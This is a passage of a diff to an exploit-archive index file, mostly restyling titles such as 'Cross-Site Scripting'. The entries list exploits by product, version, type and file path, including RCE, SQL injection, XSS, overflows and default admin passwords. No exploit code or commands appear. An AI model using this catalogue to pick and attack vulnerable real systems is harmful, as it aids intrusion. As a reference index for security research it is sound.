38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 @@ -34745,7 +34745,7 @@ id,file,description,date,author,platform,type,port 38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 -38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 +38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 @@ -34759,10 +34759,10 @@ id,file,description,date,author,platform,type,port 38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Permission Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 -38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross Site Scripting",2013-03-06,43zsec,asp,webapps,0 +38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 38480,platforms/php/webapps/38480.txt,"Fork CMS 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 -38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion and Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 +38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38484,platforms/php/webapps/38484.rb,"WordPress Ajax Load More Plugin < 2.8.2 - File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 @@ -34776,21 +34776,21 @@ id,file,description,date,author,platform,type,port 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 -38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 +38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 -38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS",2013-04-27,"Carl Benedict",hardware,remote,0 +38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 /apply.cgi - Multiple Parameter XSS",2013-04-27,"Carl Benedict",hardware,remote,0 38502,platforms/php/webapps/38502.txt,"GetSimple CMS /admin/edit.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38503,platforms/php/webapps/38503.txt,"GetSimple CMS /admin/filebrowser.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0 38505,platforms/php/remote/38505.rb,"Zpanel Remote Unauthenticated RCE",2015-10-21,Metasploit,php,remote,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager /zapiServlet CIFS Configuration Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager /zapiServlet User Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 -38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin 'games.php' Multiple Cross Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 -38509,platforms/php/webapps/38509.txt,"Securimage 'example_form.php' Cross Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 -38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 +38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 +38509,platforms/php/webapps/38509.txt,"Securimage 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 +38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0 @@ -34798,7 +34798,7 @@ id,file,description,date,author,platform,type,port 38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 -38518,platforms/php/webapps/38518.txt,"Jojo CMS 'search' Parameter Cross Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 +38518,platforms/php/webapps/38518.txt,"Jojo CMS 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 @@ -34820,8 +34820,8 @@ id,file,description,date,author,platform,type,port 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 -38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 -38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 +38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x Open Redirection",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38547,platforms/php/webapps/38547.txt,"CMS Gratis Indonesia 'config.php' PHP Code Injection",2013-06-04,"CWH Underground",php,webapps,0 38548,platforms/php/webapps/38548.txt,"Telaen Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0 @@ -34843,7 +34843,7 @@ id,file,description,date,author,platform,type,port 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 -38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross Site Scripting",2013-06-09,Darksnipper,php,webapps,0 +38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 @@ -34870,7 +34870,7 @@ id,file,description,date,author,platform,type,port 38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 -38596,platforms/php/webapps/38596.txt,"Xaraya Multiple Cross Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 +38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows x86 - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 @@ -34879,10 +34879,10 @@ id,file,description,date,author,platform,type,port 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD Multiple Local File Inclusion and Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 -38605,platforms/php/webapps/38605.txt,"Nameko 'nameko.php' Cross Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 +38605,platforms/php/webapps/38605.txt,"Nameko 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 -38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38609,platforms/windows/local/38609.py,"Gold MP4 Player - .swf Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 @@ -34897,26 +34897,26 @@ id,file,description,date,author,platform,type,port 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe Information Disclosure and Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 -38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 -38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Remote Code Execution Exploit (Pre-Auth) (0Day)",2015-11-05,hhjj,php,webapps,0 -38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 +38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0 38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0 -38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 -38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 +38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 +38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 -38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 +38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 @@ -34925,7 +34925,7 @@ id,file,description,date,author,platform,type,port 38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 -38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 +38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 @@ -34936,20 +34936,20 @@ id,file,description,date,author,platform,type,port 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0 38665,platforms/php/webapps/38665.txt,"YESWIKI 0.2 - Path Traversal",2015-11-10,HaHwul,php,webapps,0 -38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 +38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote,0 38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 -38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 +38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 -38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 -38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 -38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 +38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 +38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 -38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 +38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 @@ -34960,11 +34960,11 @@ id,file,description,date,author,platform,type,port 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 -38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 +38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 -38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 +38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - CSRF",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 @@ -34980,7 +34980,7 @@ id,file,description,date,author,platform,type,port 38709,platforms/php/webapps/38709.txt,"MCImageManager Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 -38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 +38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 38713,platforms/windows/dos/38713.txt,"Windows Kernel - win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38714,platforms/windows/dos/38714.txt,"Windows Kernel - win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815_ DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900 @@ -35029,7 +35029,7 @@ id,file,description,date,author,platform,type,port 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0 -38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting",2015-11-19,Un_N0n,windows,webapps,0 +38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross-Site Scripting",2015-11-19,Un_N0n,windows,webapps,0 38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF",2015-11-19,"High-Tech Bridge SA",php,webapps,80 @@ -35068,10 +35068,10 @@ id,file,description,date,author,platform,type,port 38799,platforms/php/webapps/38799.txt,"BilboPlanet 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 38800,platforms/php/webapps/38800.txt,"FreeSMS pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 38801,platforms/php/webapps/38801.txt,"FreeSMS pages/crc_handler.php Multiple Parameter XSS",2013-09-27,"Sarahma Security",php,webapps,0 -38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 +38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices 